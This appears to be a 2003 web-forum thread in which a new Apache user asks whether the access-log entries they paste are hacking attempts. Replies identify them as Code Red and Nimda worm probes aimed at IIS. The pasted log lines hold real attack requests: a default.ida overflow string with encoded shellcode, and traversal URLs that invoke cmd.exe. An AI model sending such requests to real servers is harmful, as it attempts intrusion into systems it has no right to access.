Is somebody hacking my server?

Gemini1706

This is my first time ever to install and run my own server, so I do not have much experience.
I am using the PHP Home Edition Latest version) which inlcudes: Apahe server, PHP 4.x, and MySQL server in one package for windows OS.
Running uner Windows XP.

Everything is running fine, but I noticed that in my access log file: access.log of the apache server, I noticed that some weird ip addresses sometimes try to access my server and excute weird commands and queries as quoted below. Is this usual thing maybe due to apache server operation, or is it someone trying to hack my system. I noticed also that all those commands/queries resulted in 404 result, which I assume means "not responding" so hopefully the hacker did not manage to get into my system.

What is this? and how can I remedy this..

Please, help..this is scary to have somebody excute weird command in my server..

Some quote from the access log file:

12.248.13.203 - - [19/Jun/2003:16:29:03 -0500] "GET /default.ida?XXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 1082
12.248.13.203 - - [19/Jun/2003:16:43:53 -0500] 
"GET /default.ida?XXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 1082
12.248.45.60 - - [19/Jun/2003:17:20:04 -0500] 
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1082
12.248.45.60 - - [19/Jun/2003:17:20:04 -0500]
 "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1082
12.248.45.60 - - [19/Jun/2003:17:20:04 -0500] 
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1082
12.248.45.60 - - [19/Jun/2003:17:20:04 -
0500] 
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1082
12.248.45.60 - - [19/Jun/2003:17:20:05 -0500] 
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
 HTTP/1.0" 404 1082
12.248.45.60 - - [19/Jun/2003:17:20:05 -0500]
 "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 1082
12.248.45.60 - - [19/Jun/2003:17:20:05 -0500] 
"GET /_mem_bin/..%255c../..%255c../..%255c
../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1082
12.248.45.60 - - [19/Jun/2003:17:20:05 -0500]
 "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c
../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1082
12.248.45.60 - - [19/Jun/2003:17:20:05 -0500]
 "GET /scripts/..%c1%1c.
./winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1082
12.248.45.60 - - [19/Jun/2003:17:20:05 -0500] 
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1082
12.248.45.60 - - [19/Jun/2003:17:20:05 -0500]
 "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1082
12.248.45.60 - - [19/Jun/2003:17:20:06 -0500] 
"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1082
12.248.45.60 - - [19/Jun/2003:17:20:06 -0500] 
"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 1009
12.248.45.60 - - [19/Jun/2003:17:20:06 -0500]
 "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 1009
12.248.45.60 - - [19/Jun/2003:17:20:06 -0500] 
"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1082
12.248.45.60 - - [19/Jun/2003:17:20:06 -0500] 
"GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1082
12.246.137.69 - - [19/Jun/2003:17:25:07 -0500] "GET /default.ida?XXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 1082

Thanks in advance...

basil

I don't know who it would be, or why, but I can tell you it as from a IP owned by

AT&T So you might contact their abuse department. (Make sure that's not your own IP of course 😃 )

Basil

jimson

if i am not wrong...
the default.ida is from code red worm..
this means 12.248.13.203 is already infected with code red worm. purposely or unintentionally (i don't know)...
most of the url u post is target to IIS server... so, no worry since u are using apache.
basically, if u wish to understand more u can try
cut and paste the url on google and it should returns some information to u.

Gemini1706

Thanks guys...
So it is actually Code Red worm, after searching for the string in google..

Looks like nothing I need to worry about, since I am running Apache 🙂

Thanks again 🙂

dalecosp

default.ida is Code Red...the other sh*t is Nimda...

As you said, little to worry about with apache...aside from filling up your logs....